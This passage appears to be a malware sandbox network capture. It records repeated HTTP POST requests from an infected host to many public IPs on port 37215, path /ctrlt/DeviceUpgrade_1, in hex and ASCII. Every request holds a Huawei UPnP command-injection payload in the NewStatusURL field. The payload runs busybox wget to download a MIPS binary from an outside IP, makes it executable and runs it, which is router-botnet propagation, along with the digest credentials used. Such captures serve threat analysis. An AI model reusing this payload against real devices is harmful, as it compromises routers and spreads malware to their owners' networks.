20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            674192.168.2.1352172197.78.160.737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.640547991 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            675192.168.2.134726241.229.155.15037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.641252041 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            676192.168.2.1357774197.167.195.15337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.641973019 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            677192.168.2.1341888156.17.79.8937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.642678022 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            678192.168.2.1354252156.20.242.16137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.643438101 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            679192.168.2.135045041.237.168.8537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.644239902 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            680192.168.2.1360718156.152.171.19637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.644982100 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            681192.168.2.134326241.98.155.7137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.645711899 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            682192.168.2.1345280197.159.14.16537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.646437883 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            683192.168.2.1339070156.230.86.2037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.647206068 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            684192.168.2.1351404197.111.134.17537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.647914886 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
